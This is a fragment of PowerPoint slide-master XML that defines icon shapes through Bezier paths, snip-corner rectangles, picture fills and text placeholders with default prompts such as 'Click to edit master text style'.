                  <a:gd name="T1" fmla="*/ 0 h 65"/>
                  <a:gd name="T2" fmla="*/ 21 w 21"/>
                  <a:gd name="T3" fmla="*/ 8 h 65"/>
                  <a:gd name="T4" fmla="*/ 21 w 21"/>
                  <a:gd name="T5" fmla="*/ 57 h 65"/>
                  <a:gd name="T6" fmla="*/ 13 w 21"/>
                  <a:gd name="T7" fmla="*/ 65 h 65"/>
                  <a:gd name="T8" fmla="*/ 8 w 21"/>
                  <a:gd name="T9" fmla="*/ 65 h 65"/>
                  <a:gd name="T10" fmla="*/ 0 w 21"/>
                  <a:gd name="T11" fmla="*/ 57 h 65"/>
                  <a:gd name="T12" fmla="*/ 0 w 21"/>
                  <a:gd name="T13" fmla="*/ 8 h 65"/>
                  <a:gd name="T14" fmla="*/ 8 w 21"/>
                  <a:gd name="T15" fmla="*/ 0 h 65"/>
                  <a:gd name="T16" fmla="*/ 13 w 21"/>
                  <a:gd name="T17" fmla="*/ 0 h 65"/>
                  <a:gd name="T18" fmla="*/ 11 w 21"/>
                  <a:gd name="T19" fmla="*/ 59 h 65"/>
                  <a:gd name="T20" fmla="*/ 14 w 21"/>
                  <a:gd name="T21" fmla="*/ 56 h 65"/>
                  <a:gd name="T22" fmla="*/ 14 w 21"/>
                  <a:gd name="T23" fmla="*/ 9 h 65"/>
                  <a:gd name="T24" fmla="*/ 11 w 21"/>
                  <a:gd name="T25" fmla="*/ 6 h 65"/>
                  <a:gd name="T26" fmla="*/ 10 w 21"/>
                  <a:gd name="T27" fmla="*/ 6 h 65"/>
                  <a:gd name="T28" fmla="*/ 6 w 21"/>
                  <a:gd name="T29" fmla="*/ 9 h 65"/>
                  <a:gd name="T30" fmla="*/ 6 w 21"/>
                  <a:gd name="T31" fmla="*/ 56 h 65"/>
                  <a:gd name="T32" fmla="*/ 10 w 21"/>
                  <a:gd name="T33" fmla="*/ 59 h 65"/>
                  <a:gd name="T34" fmla="*/ 11 w 21"/>
                  <a:gd name="T35"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65">
                    <a:moveTo>
                      <a:pt x="13" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="21" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="57"/>
                      <a:pt x="21" y="57"/>
                      <a:pt x="21" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="61"/>
                      <a:pt x="17" y="65"/>
                      <a:pt x="13" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="65"/>
                      <a:pt x="8" y="65"/>
                      <a:pt x="8" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="65"/>
                      <a:pt x="0" y="61"/>
                      <a:pt x="0" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="0" y="8"/>
                      <a:pt x="0" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="11" y="59"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="59"/>
                      <a:pt x="14" y="57"/>
                      <a:pt x="14" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="9"/>
                      <a:pt x="14" y="9"/>
                      <a:pt x="14" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="7"/>
                      <a:pt x="12" y="6"/>
                      <a:pt x="11" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="6"/>
                      <a:pt x="6" y="7"/>
                      <a:pt x="6" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="56"/>
                      <a:pt x="6" y="56"/>
                      <a:pt x="6" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="57"/>
                      <a:pt x="8" y="59"/>
                      <a:pt x="10" y="59"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="11"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377"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9828213" y="3994150"/>
                <a:ext cx="47625" cy="146050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 21"/>
                  <a:gd name="T1" fmla="*/ 63 h 63"/>
                  <a:gd name="T2" fmla="*/ 18 w 21"/>
                  <a:gd name="T3" fmla="*/ 63 h 63"/>
                  <a:gd name="T4" fmla="*/ 14 w 21"/>
                  <a:gd name="T5" fmla="*/ 59 h 63"/>
                  <a:gd name="T6" fmla="*/ 7 w 21"/>
                  <a:gd name="T7" fmla="*/ 28 h 63"/>
                  <a:gd name="T8" fmla="*/ 7 w 21"/>
                  <a:gd name="T9" fmla="*/ 63 h 63"/>
                  <a:gd name="T10" fmla="*/ 0 w 21"/>
                  <a:gd name="T11" fmla="*/ 63 h 63"/>
                  <a:gd name="T12" fmla="*/ 0 w 21"/>
                  <a:gd name="T13" fmla="*/ 0 h 63"/>
                  <a:gd name="T14" fmla="*/ 3 w 21"/>
                  <a:gd name="T15" fmla="*/ 0 h 63"/>
                  <a:gd name="T16" fmla="*/ 8 w 21"/>
                  <a:gd name="T17" fmla="*/ 3 h 63"/>
                  <a:gd name="T18" fmla="*/ 15 w 21"/>
                  <a:gd name="T19" fmla="*/ 36 h 63"/>
                  <a:gd name="T20" fmla="*/ 15 w 21"/>
                  <a:gd name="T21" fmla="*/ 0 h 63"/>
                  <a:gd name="T22" fmla="*/ 21 w 21"/>
                  <a:gd name="T23" fmla="*/ 0 h 63"/>
                  <a:gd name="T24" fmla="*/ 21 w 21"/>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63">
                    <a:moveTo>
                      <a:pt x="21" y="63"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="63"/>
                      <a:pt x="18" y="63"/>
                      <a:pt x="18" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="63"/>
                      <a:pt x="14" y="60"/>
                      <a:pt x="14" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="28"/>
                      <a:pt x="7" y="28"/>
                      <a:pt x="7" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="63"/>
                      <a:pt x="7" y="63"/>
                      <a:pt x="7" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="63"/>
                      <a:pt x="0" y="63"/>
                      <a:pt x="0" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="1"/>
                      <a:pt x="8" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="36"/>
                      <a:pt x="15" y="36"/>
                      <a:pt x="15" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="0"/>
                      <a:pt x="15" y="0"/>
                      <a:pt x="15" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="0"/>
                      <a:pt x="21" y="0"/>
                      <a:pt x="21" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21"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 name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="1928376"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3600" b="1">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58813" y="4573587"/>
            <a:ext cx="9144000" cy="14902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676689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l="364" t="20455" b="7640"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1456904"/>
            <a:ext cx="11582400" cy="4692724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="מלבן 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="609600" y="1456904"/>
            <a:ext cx="11582400" cy="4692725"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16597"/>
            </a:avLst>
          </a:pr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sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="500070" y="1076676"/>
            <a:ext cx="558800" cy="12306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a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="619512" y="1456904"/>
            <a:ext cx="384240" cy="386584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 157 w 177"/>
              <a:gd name="T1" fmla="*/ 69 h 178"/>
              <a:gd name="T2" fmla="*/ 108 w 177"/>
              <a:gd name="T3" fmla="*/ 69 h 178"/>
              <a:gd name="T4" fmla="*/ 108 w 177"/>
              <a:gd name="T5" fmla="*/ 20 h 178"/>
              <a:gd name="T6" fmla="*/ 88 w 177"/>
              <a:gd name="T7" fmla="*/ 0 h 178"/>
              <a:gd name="T8" fmla="*/ 68 w 177"/>
              <a:gd name="T9" fmla="*/ 20 h 178"/>
              <a:gd name="T10" fmla="*/ 68 w 177"/>
              <a:gd name="T11" fmla="*/ 69 h 178"/>
              <a:gd name="T12" fmla="*/ 20 w 177"/>
              <a:gd name="T13" fmla="*/ 69 h 178"/>
              <a:gd name="T14" fmla="*/ 0 w 177"/>
              <a:gd name="T15" fmla="*/ 89 h 178"/>
              <a:gd name="T16" fmla="*/ 20 w 177"/>
              <a:gd name="T17" fmla="*/ 109 h 178"/>
              <a:gd name="T18" fmla="*/ 68 w 177"/>
              <a:gd name="T19" fmla="*/ 109 h 178"/>
              <a:gd name="T20" fmla="*/ 68 w 177"/>
              <a:gd name="T21" fmla="*/ 158 h 178"/>
              <a:gd name="T22" fmla="*/ 88 w 177"/>
              <a:gd name="T23" fmla="*/ 178 h 178"/>
              <a:gd name="T24" fmla="*/ 108 w 177"/>
              <a:gd name="T25" fmla="*/ 158 h 178"/>
              <a:gd name="T26" fmla="*/ 108 w 177"/>
              <a:gd name="T27" fmla="*/ 109 h 178"/>
              <a:gd name="T28" fmla="*/ 157 w 177"/>
              <a:gd name="T29" fmla="*/ 109 h 178"/>
              <a:gd name="T30" fmla="*/ 177 w 177"/>
              <a:gd name="T31" fmla="*/ 89 h 178"/>
              <a:gd name="T32" fmla="*/ 157 w 177"/>
              <a:gd name="T33" fmla="*/ 6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7" h="178">
                <a:moveTo>
                  <a:pt x="157" y="69"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="9"/>
                  <a:pt x="99" y="0"/>
                  <a:pt x="88" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="0"/>
                  <a:pt x="68" y="9"/>
                  <a:pt x="68" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="69"/>
                  <a:pt x="0" y="78"/>
                  <a:pt x="0" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100"/>
                  <a:pt x="9" y="109"/>
                  <a:pt x="20" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="169"/>
                  <a:pt x="77" y="178"/>
                  <a:pt x="88" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="178"/>
                  <a:pt x="108" y="169"/>
                  <a:pt x="108" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="109"/>
                  <a:pt x="177" y="100"/>
                  <a:pt x="177" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="78"/>
                  <a:pt x="168" y="69"/>
                  <a:pt x="157" y="69"/>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1143228" y="1934935"/>
            <a:ext cx="7086600" cy="3935413"/>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0085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ver 1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Diagonal Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2781739" y="1390453"/>
            <a:ext cx="6625380" cy="4077094"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
              <a:gd name="adj2" fmla="val 20135"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33384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
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2781739" y="1390452"/>
            <a:ext cx="313884" cy="315799"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 157 w 177"/>
              <a:gd name="T1" fmla="*/ 69 h 178"/>
              <a:gd name="T2" fmla="*/ 108 w 177"/>
              <a:gd name="T3" fmla="*/ 69 h 178"/>
              <a:gd name="T4" fmla="*/ 108 w 177"/>
              <a:gd name="T5" fmla="*/ 20 h 178"/>
              <a:gd name="T6" fmla="*/ 88 w 177"/>
              <a:gd name="T7" fmla="*/ 0 h 178"/>
              <a:gd name="T8" fmla="*/ 68 w 177"/>
              <a:gd name="T9" fmla="*/ 20 h 178"/>
              <a:gd name="T10" fmla="*/ 68 w 177"/>
              <a:gd name="T11" fmla="*/ 69 h 178"/>
              <a:gd name="T12" fmla="*/ 20 w 177"/>
              <a:gd name="T13" fmla="*/ 69 h 178"/>
              <a:gd name="T14" fmla="*/ 0 w 177"/>
              <a:gd name="T15" fmla="*/ 89 h 178"/>
              <a:gd name="T16" fmla="*/ 20 w 177"/>
              <a:gd name="T17" fmla="*/ 109 h 178"/>
              <a:gd name="T18" fmla="*/ 68 w 177"/>
              <a:gd name="T19" fmla="*/ 109 h 178"/>
              <a:gd name="T20" fmla="*/ 68 w 177"/>
              <a:gd name="T21" fmla="*/ 158 h 178"/>
              <a:gd name="T22" fmla="*/ 88 w 177"/>
              <a:gd name="T23" fmla="*/ 178 h 178"/>
              <a:gd name="T24" fmla="*/ 108 w 177"/>
              <a:gd name="T25" fmla="*/ 158 h 178"/>
              <a:gd name="T26" fmla="*/ 108 w 177"/>
              <a:gd name="T27" fmla="*/ 109 h 178"/>
              <a:gd name="T28" fmla="*/ 157 w 177"/>
              <a:gd name="T29" fmla="*/ 109 h 178"/>
              <a:gd name="T30" fmla="*/ 177 w 177"/>
              <a:gd name="T31" fmla="*/ 89 h 178"/>
              <a:gd name="T32" fmla="*/ 157 w 177"/>
              <a:gd name="T33" fmla="*/ 6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7" h="178">
                <a:moveTo>
                  <a:pt x="157" y="69"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="9"/>
                  <a:pt x="99" y="0"/>
                  <a:pt x="88" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="0"/>
                  <a:pt x="68" y="9"/>
                  <a:pt x="68" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="69"/>
                  <a:pt x="0" y="78"/>
                  <a:pt x="0" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100"/>
                  <a:pt x="9" y="109"/>
                  <a:pt x="20" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="169"/>
                  <a:pt x="77" y="178"/>
                  <a:pt x="88" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="178"/>
                  <a:pt x="108" y="169"/>
                  <a:pt x="108" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="109"/>
                  <a:pt x="177" y="100"/>
                  <a:pt x="177" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="78"/>
                  <a:pt x="168" y="69"/>
                  <a:pt x="157" y="69"/>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 name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2781740" y="3668215"/>
            <a:ext cx="6625379" cy="742825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1219160" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3352688" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="2800" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2781739" y="2331721"/>
            <a:ext cx="6625380" cy="1145361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1219160" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3352688" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="3200" b="0" kern="1200" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit cover title style </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25108132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ver 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92" y="-361"/>
            <a:ext cx="12198391" cy="6858500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6392" y="-361"/>
            <a:ext cx="12198392" cy="6858361"/>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nip Diagonal Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="487052" y="492232"/>
            <a:ext cx="11217897" cy="5760414"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
              <a:gd name="adj2" fmla="val 20135"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="6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
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="487052" y="492232"/>
            <a:ext cx="457086" cy="459875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 157 w 177"/>
              <a:gd name="T1" fmla="*/ 69 h 178"/>
              <a:gd name="T2" fmla="*/ 108 w 177"/>
              <a:gd name="T3" fmla="*/ 69 h 178"/>
              <a:gd name="T4" fmla="*/ 108 w 177"/>
              <a:gd name="T5" fmla="*/ 20 h 178"/>
              <a:gd name="T6" fmla="*/ 88 w 177"/>
              <a:gd name="T7" fmla="*/ 0 h 178"/>
              <a:gd name="T8" fmla="*/ 68 w 177"/>
              <a:gd name="T9" fmla="*/ 20 h 178"/>
              <a:gd name="T10" fmla="*/ 68 w 177"/>
              <a:gd name="T11" fmla="*/ 69 h 178"/>
              <a:gd name="T12" fmla="*/ 20 w 177"/>
              <a:gd name="T13" fmla="*/ 69 h 178"/>
              <a:gd name="T14" fmla="*/ 0 w 177"/>
              <a:gd name="T15" fmla="*/ 89 h 178"/>
              <a:gd name="T16" fmla="*/ 20 w 177"/>
              <a:gd name="T17" fmla="*/ 109 h 178"/>
              <a:gd name="T18" fmla="*/ 68 w 177"/>
              <a:gd name="T19" fmla="*/ 109 h 178"/>
              <a:gd name="T20" fmla="*/ 68 w 177"/>
              <a:gd name="T21" fmla="*/ 158 h 178"/>
              <a:gd name="T22" fmla="*/ 88 w 177"/>
              <a:gd name="T23" fmla="*/ 178 h 178"/>
              <a:gd name="T24" fmla="*/ 108 w 177"/>
              <a:gd name="T25" fmla="*/ 158 h 178"/>
              <a:gd name="T26" fmla="*/ 108 w 177"/>
              <a:gd name="T27" fmla="*/ 109 h 178"/>
              <a:gd name="T28" fmla="*/ 157 w 177"/>
              <a:gd name="T29" fmla="*/ 109 h 178"/>
              <a:gd name="T30" fmla="*/ 177 w 177"/>
              <a:gd name="T31" fmla="*/ 89 h 178"/>
              <a:gd name="T32" fmla="*/ 157 w 177"/>
              <a:gd name="T33" fmla="*/ 6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7" h="178">
                <a:moveTo>
                  <a:pt x="157" y="69"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="9"/>
                  <a:pt x="99" y="0"/>
                  <a:pt x="88" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="0"/>
                  <a:pt x="68" y="9"/>
                  <a:pt x="68" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="69"/>
                  <a:pt x="0" y="78"/>
                  <a:pt x="0" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100"/>
                  <a:pt x="9" y="109"/>
                  <a:pt x="20" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="169"/>
                  <a:pt x="77" y="178"/>
                  <a:pt x="88" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="178"/>
                  <a:pt x="108" y="169"/>
                  <a:pt x="108" y="158"/>
